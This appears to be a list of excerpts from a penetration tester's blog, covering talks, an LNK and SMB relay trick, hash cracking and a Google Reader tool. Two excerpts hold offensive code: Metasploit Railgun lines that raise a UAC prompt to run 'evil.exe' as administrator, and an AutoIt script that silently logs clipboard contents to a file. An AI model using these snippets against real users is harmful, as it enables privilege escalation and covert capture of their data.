Since this is a constantly updating slide deck I figured I’d post it here so I didn’t have to keep emailing it out. ;-) If you have comments or if something is wrong grammatically, technically or in any other way I’d love input. Suggestions also welcome. Here is a link straight to the doc if you want to comment or add it to your google docs list: https://docs.google.com/presentation/d/1pPXLg3KqwSMLRCNRfows5QnVI2mLjSmll5vN2WHMFJg/edit
This was an honest idea to help identify people that might not get the media attention of other “Top X in Infosec” lists. But I should have known better than to put a poll on the internet…
I have been using the LNK trick I talked about in my last post for a while, but always needing a Windows machine to create the LNK file. When I decided to write a post about it, I wanted to put the stipulation for myself that I would finally develop a way to get it done with out having to lug around a VM or spin one up every time I needed to change it’s target.
*TL;DR:* SMB Relay + LNK UNC icons = internal pentest pwnage I need to touch on the highlights of two vulnerabilities before we talk about the fun stuff, but I highly encourage you to read the references at the bottom of this post and understand the vulnerabilities after you are done with my little trick, as you might find one of your own. MS08_068: http://www.cvedetails.com/cve/CVE-2008-4037/ In 2008, Microsoft released MS08_068 which patched the “SMB Relay” attack.
This is my talk that I gave at ShmooCon 2012. It was a great honor to be given the chance to speak at ShmooCon as it has been my second home since 2006 (missed the first one… havent missed one since) A @textfiles approach to gathering the world's DNS from Rob Fuller
A number of times during tests I’ve actually run into those mythical creatures called “patched windows machines”. At DerbyCon Chris Gates and I released the “Ask” post module (which I had failed to publish). This module very simply uses the ShellExecute windows function.aspx”) via Railgun with the undocumented (but very well known) operator of ‘runas’. These two lines accomplished that: client.railgun.add_function( 'shell32', 'ShellExecuteA', 'DWORD',[["DWORD","hwnd","in"],["PCHAR","lpOperation","in"],["PCHAR","lpFile","in"],["PCHAR","lpParameters","in"],["PCHAR","lpDirectory","in"],["DWORD","nShowCmd","in"],]) client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5) This would quite simply prompt the user with that annoying UAC prompt asking the user to run ‘evil.
Since it’s Christmas and all, I thought I’d post the code snippet from my Hak5 segment a bit early: #include <Clipboard.au3> #include <File.au3> $oldclip = "" While 1 $clip = _ClipBoard_GetData() If $clip <> "0" Then If $clip <> $oldclip Then _FileWriteLog(@UserProfileDir & "clip.log", $clip) $oldclip = $clip EndIf EndIf Sleep(100) WEnd It’s pretty straight forward, and I welcome everyone to install AutoIt3 and compile/run the above script to see what it does (although most of you I’m sure can figure it out just by reading it).
When Google Reader decided to remove everything it was good for, we all scrambled to find new homes for things we wanted to share. Tumblr became a place that most of us flocked. I’ve found Tumblr to be not a very good substitue for Google Reader’s functionality (IMHO). The other day, carnal0wnage told me about a service called ‘Buffer’, and all this thing does is do scheduled tweets, but it has one distinct feature, not only is it focused around the sharing of links, it works (if you install the browser plugin/extension) INSIDE OF GOOGLE READER ;-) So you can be reading a feed item, push a button and not have to open a page or another app, it’s pretty much all right there.
Pentest Monkey is a great resource for a lot of things. One of which is this: John The Ripper Hash Formats | pentestmonkey I used it, plus a bit of bash fu to try to figure out some hashes that I was trying to crack. Step 1: Create file of supported hash types. For me, that was simple I just threw the following in ‘supported_types.txt’ in the same directory as john.
Our first day of No Starch winner is Russ with Room 362 right next to the Fire Hose ;-) 1st Day of @NoStarch Winner